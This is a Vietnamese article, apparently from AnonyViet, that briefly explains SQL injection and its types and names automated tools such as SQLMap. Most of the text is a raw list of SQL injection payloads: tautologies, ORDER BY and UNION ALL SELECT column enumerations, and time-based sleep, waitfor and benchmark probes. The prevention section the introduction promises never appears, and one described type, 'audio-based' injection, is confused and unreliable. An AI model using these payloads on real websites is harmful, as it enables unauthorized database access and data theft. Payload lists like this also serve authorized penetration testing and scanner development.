(Anonyviet) SQL Injection là một hình thức tấn công bảo mật và việc thực hiện hoặc khuyến nghị sử dụng các payload SQL Injection có thể là vi phạm đạo luật và gây ra hậu quả nghiêm trọng.

Trong bài này, mình sẽ giải thích SQL injection là gì, một số ví dụ phổ biến, giải thích cách tìm và khai thác các loại lỗ hổng SQL injection và cách ngăn chặn SQL injection.

SQL injection (SQLi) là gì?

SQL injection là một lỗ hổng an ninh trên các trang web, cho phép kẻ tấn công can thiệp vào các truy vấn mà ứng dụng thực hiện đối với cơ sở dữ liệu của nó. Điều này thường dẫn đến khả năng cho phép kẻ tấn công đánh cắp dữ liệu mà họ thường không thể truy cập. Bao gồm cả thông tin liên quan đến người dùng hoặc bất kỳ dữ liệu nào khác mà ứng dụng có quyền truy cập. Trong nhiều tình huống, kẻ tấn công thậm chí có thể can thiệp, chỉnh sửa hoặc xóa dữ liệu này, tạo ra sự biến đổi liên tục đối với nội dung hoặc cách thức hoạt động của ứng dụng.

Trong một số tình huống, kẻ tấn công có thể leo thang một cuộc tấn công SQL injection để xâm phạm máy chủ hoặc cơ sở hạ tầng back-end hoặc thực hiện một cuộc tấn công từ chối dịch vụ.

Các loại SQL injection:

SQL Injection, hay còn gọi là tiêm SQL, là một hình thức tấn công trên các hệ thống web, thường dẫn đến việc kẻ tấn công có khả năng can thiệp vào các truy vấn mà ứng dụng sử dụng để truy xuất cơ sở dữ liệu của họ. Hình thức này thường cho phép kẻ tấn công truy cập vào thông tin mà họ thường không thể tiếp cận. Thông tin này có thể liên quan đến người dùng hoặc bất kỳ dữ liệu nào mà ứng dụng có khả năng truy xuất. Trong một số trường hợp, kẻ tấn công có thể sửa đổi hoặc xóa thông tin này, tạo ra sự thay đổi liên tục trong nội dung hoặc hành vi của ứng dụng.

 1. In-band SQL Injection, hay còn gọi là SQLi cổ điển, là một trong những phương thức phổ biến nhất và dễ tấn công nhất của SQL Injection. SQLi In-band xảy ra khi kẻ tấn công có khả năng sử dụng cùng một kênh liên lạc để khởi đầu tấn công và thu thập kết quả. Có hai loại phổ biến của SQL Injection này là SQLi dựa trên lỗi và SQLi dựa trên Union.
 2. SQLi dựa trên lỗi là một kỹ thuật SQLi dựa vào việc sử dụng thông điệp lỗi do máy chủ cơ sở dữ liệu phát ra để thu thập thông tin về cấu trúc cơ sở dữ liệu. Trong một số trường hợp, việc chèn SQL dựa trên lỗi có thể đủ để kẻ tấn công hiển thị toàn bộ cơ sở dữ liệu.
 3. SQLi dựa trên Union là một kỹ thuật tiêm SQL in-band sử dụng toán tử SQL UNION để kết hợp kết quả từ hai hoặc nhiều lệnh SELECT thành một kết quả duy nhất, sau đó được trả về như một phần của phản hồi HTTP.
 4. SQL Injection mù (Blind SQLi) lại là một hình thức khác, khá nguy hiểm và tốn thời gian hơn, trong đó không có dữ liệu nào được truyền qua ứng dụng web, và kẻ tấn công không thể thấy kết quả trực tiếp. Thay vào đó, họ phải tái tạo cấu trúc cơ sở dữ liệu bằng cách gửi các payload, quan sát phản hồi từ ứng dụng web và thời gian phản hồi từ máy chủ cơ sở dữ liệu. Có hai loại SQL Injection mù phổ biến là SQLi mù dựa trên boolean và SQLi mù dựa trên thời gian.
 5. SQLi mù dựa trên boolean là một kỹ thuật SQL Injection suy luận, thay đổi phản hồi của ứng dụng dựa trên việc truy vấn trả về TRUE hoặc FALSE. Kẻ tấn công có thể suy luận kết quả dựa trên phản hồi từ ứng dụng web.
 6. SQLi mù dựa trên thời gian là một kỹ thuật SQL Injection suy luận, đặt cơ sở dữ liệu phải đợi một thời gian cụ thể trước khi phản hồi. Thời gian phản hồi cho biết kết quả của truy vấn là TRUE hoặc FALSE, và dựa vào thời gian phản hồi, kẻ tấn công có thể suy luận kết quả.
 7. SQL Injection ngoài băng tần (Out-of-Band SQLi) là một hình thức khá hiếm, phụ thuộc vào cấu hình của máy chủ cơ sở dữ liệu mà ứng dụng web sử dụng. Trong trường hợp này, kẻ tấn công không thể sử dụng cùng một kênh liên lạc và thu thập kết quả. Các kỹ thuật này cung cấp giải pháp thay thế cho các kỹ thuật suy luận dựa trên thời gian, đặc biệt khi phản hồi từ máy chủ không ổn định.
 8. SQL Injection dựa trên âm thanh là một phương pháp tấn công SQL Injection có thể áp dụng trong các ứng dụng cho phép truy cập vào cơ sở dữ liệu thông qua lệnh thoại. Kẻ tấn công có thể trích xuất thông tin từ cơ sở dữ liệu bằng cách gửi các truy vấn SQL cùng với âm thanh.

 Công cụ quét lỗ hổng SQL Injection như :

 • SQLMap – Công cụ quét cơ sở dữ liệu và tiêm SQL tự động
 • jSQL Injection – Công cụ Java để tiêm SQL tự động
 • BBQSQL – Một công cụ khai thác SQL-Injection mù
 • NoSQLMap – Pwnage cơ sở dữ liệu NoSQL tự động
 • Whitewidow – Máy quét lỗ hổng SQL
 • DSSS – Máy quét lỗ hổng SQLi nhỏ
 • explore – Định dạng kiểm tra lỗ hổng trên web
 • Blind-Sql-Bitshifting – Blind SQL-Injection qua Bitshifting
 • Leviathan – Bộ công cụ kiểm tra hàng loạt trên phạm vi rộng
 • Blisqy – Khai thác phương thức tiêm SQL mù dựa trên thời gian trong HTTP-Headers (MySQL / MariaDB)

Các payload SQL Injection

'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator
@variable local variable
@@variable global variable
# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
Comments:
# Hash comment
/* C-style comment
-- - SQL comment
;%00 Nullbyte
` Backtick

Các payload dựa trên lỗi

OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1--
OR 1=0--
OR x=x--
OR x=y--
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
HAVING 1=1
HAVING 1=0
HAVING 1=1#
HAVING 1=0#
HAVING 1=1--
HAVING 1=0--
AND 1=1
AND 1=0
AND 1=1--
AND 1=0--
AND 1=1#
AND 1=0#
AND 1=1 AND '%'='
AND 1=0 AND '%'='
AND 1083=1083 AND (1427=1427
AND 7506=9091 AND (5913=5913
AND 1083=1083 AND ('1427=1427
AND 7506=9091 AND ('5913=5913
AND 7300=7300 AND 'pKlZ'='pKlZ
AND 7300=7300 AND 'pKlZ'='pKlY
AND 7300=7300 AND ('pKlZ'='pKlZ
AND 7300=7300 AND ('pKlZ'='pKlY
AS INJECTX WHERE 1=1 AND 1=1
AS INJECTX WHERE 1=1 AND 1=0
AS INJECTX WHERE 1=1 AND 1=1#
AS INJECTX WHERE 1=1 AND 1=0#
AS INJECTX WHERE 1=1 AND 1=1--
AS INJECTX WHERE 1=1 AND 1=0--
WHERE 1=1 AND 1=1
WHERE 1=1 AND 1=0
WHERE 1=1 AND 1=1#
WHERE 1=1 AND 1=0#
WHERE 1=1 AND 1=1--
WHERE 1=1 AND 1=0--
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 4--
ORDER BY 5--
ORDER BY 6--
ORDER BY 7--
ORDER BY 8--
ORDER BY 9--
ORDER BY 10--
ORDER BY 11--
ORDER BY 12--
ORDER BY 13--
ORDER BY 14--
ORDER BY 15--
ORDER BY 16--
ORDER BY 17--
ORDER BY 18--
ORDER BY 19--
ORDER BY 20--
ORDER BY 21--
ORDER BY 22--
ORDER BY 23--
ORDER BY 24--
ORDER BY 25--
ORDER BY 26--
ORDER BY 27--
ORDER BY 28--
ORDER BY 29--
ORDER BY 30--
ORDER BY 31337--
ORDER BY 1#
ORDER BY 2#
ORDER BY 3#
ORDER BY 4#
ORDER BY 5#
ORDER BY 6#
ORDER BY 7#
ORDER BY 8#
ORDER BY 9#
ORDER BY 10#
ORDER BY 11#
ORDER BY 12#
ORDER BY 13#
ORDER BY 14#
ORDER BY 15#
ORDER BY 16#
ORDER BY 17#
ORDER BY 18#
ORDER BY 19#
ORDER BY 20#
ORDER BY 21#
ORDER BY 22#
ORDER BY 23#
ORDER BY 24#
ORDER BY 25#
ORDER BY 26#
ORDER BY 27#
ORDER BY 28#
ORDER BY 29#
ORDER BY 30#
ORDER BY 31337#
ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
ORDER BY 5
ORDER BY 6
ORDER BY 7
ORDER BY 8
ORDER BY 9
ORDER BY 10
ORDER BY 11
ORDER BY 12
ORDER BY 13
ORDER BY 14
ORDER BY 15
ORDER BY 16
ORDER BY 17
ORDER BY 18
ORDER BY 19
ORDER BY 20
ORDER BY 21
ORDER BY 22
ORDER BY 23
ORDER BY 24
ORDER BY 25
ORDER BY 26
ORDER BY 27
ORDER BY 28
ORDER BY 29
ORDER BY 30
ORDER BY 31337
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
and (select substring(@@version,1,1))='X'
and (select substring(@@version,1,1))='M'
and (select substring(@@version,2,1))='i'
and (select substring(@@version,2,1))='y'
and (select substring(@@version,3,1))='c'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'

Các payload SQL Injection dựa trên thời gian

# from wapiti
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

Các Payload Union

ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY SLEEP(5)#
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY SLEEP(5)--
ORDER BY 1,SLEEP(5)--
ORDER BY 1,SLEEP(5),3--
ORDER BY 1,SLEEP(5),3,4--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 1#
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
